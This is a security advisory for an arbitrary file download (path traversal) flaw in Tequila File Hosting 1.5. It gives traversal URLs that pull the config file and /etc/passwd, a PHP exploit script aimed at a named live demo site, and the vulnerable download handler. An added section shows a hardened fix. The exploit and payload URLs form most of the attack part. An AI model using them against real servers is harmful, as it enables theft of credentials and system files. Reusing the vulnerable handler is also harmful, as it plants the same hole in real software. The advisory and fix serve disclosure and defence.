Tequila File Hosting 1.5 Arbitrary File Download

2015.12.16
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

================================================================================
Tequila File Hosting Arbitrary File Download
================================================================================
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
# Software Link: http://ehsansec.ir/apps/Tequila_v1.5-File_Hosting_Script.rar
# Date: 16/12/2015
# Author: Ashiyane Digital Security Team
# Version: 1.5
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
================================================================================
# Description:
Tequila is a solid, safe, fast, simple and intuitive script which allows companies or individuals to upload, manage and share their files online. It is studied in every feature and was produced with attention to every detail.

# PoC :

# Download Config
http://localhost/tequila/download.php?filename=files/../include/php/constants.php&name=file.php

# Download passwd
http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd

# (PHP Exploit):
<?php
// page : download.php
echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
echo "Discoverd By Ehsan Hosseini\n\n\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://themedema.altervista.org/demo_tequila3/download.php?filename=files/../include/php/constants.php&name=file.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

# Vulnerable code:
<?php
// This script forces the download of the file.
// Retrieve the file name from the query string,
// including the path to the download folder.
$fn = (isset($_GET['filename']) ? $_GET['filename'] : false);
$file = $fn;
$sn = (isset($_GET['name']) ? $_GET['name'] : false);
$secure_name = $sn;

// The only check: the substring "files/" must appear somewhere in the path.
// "../" sequences are not rejected and the path is never canonicalized.
if (strpos($file, "files/") !== false) {
    $checkdownload = "true";
} else {
    $checkdownload = "false";
}

// Check that the file exists
if ($checkdownload == "true") {
    if (!file_exists($file)) {
        // If it does not, print an error
        echo "The file does not exist!";
    } else {
        // If the file exists ...
        // Set the response headers to force the download of the file
        header("Cache-Control: public");
        header("Content-Description: File Transfer");
        header('Content-Type: application/zip');
        header("Content-Disposition: attachment; filename= " . $secure_name);
        header("Content-Transfer-Encoding: binary");
        header('Connection: Keep-Alive');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        // Read the contents of the file and send them to the client
        readfile($file);
        exit;
    }
}
?>
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
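
# Hardened handler (added example, not part of the original advisory or the vendor's code):
The check above passes any path that merely contains "files/", so the fix is to canonicalize the path and confirm it still sits under the upload directory. The sketch below assumes uploads live in a `files` directory beside the script and that `filename` is given relative to it; `resolve_download` and `safe_display_name` are hypothetical helper names.

```php
<?php
// Added example, not Tequila code. Assumption: uploads live in ./files and
// `filename` is relative to that directory.

// Map a requested name to a canonical path inside $baseDir, or null.
function resolve_download(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "../" and resolves symlinks; false if missing.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the canonical base plus a trailing separator, so a
    // sibling such as "files_old" cannot pass as "files".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Keep only a conservative character set for the Content-Disposition name.
function safe_display_name(string $name): string
{
    $clean = (string) preg_replace('/[^A-Za-z0-9._-]/', '_', basename($name));
    return in_array($clean, ['', '.', '..'], true) ? 'download' : $clean;
}

if (PHP_SAPI !== 'cli') {
    $param = static function (string $key): string {
        return is_string($_GET[$key] ?? null) ? $_GET[$key] : '';
    };
    $path = resolve_download(__DIR__ . '/files', $param('filename'));
    if ($path === null) {
        http_response_code(404);
        exit('The file does not exist!');
    }
    $name = safe_display_name($param('name') !== '' ? $param('name') : $path);
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}
```

With this check, both PoC paths resolve outside the canonical upload directory (or to a non-existent file) and receive the 404 response instead of file contents.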

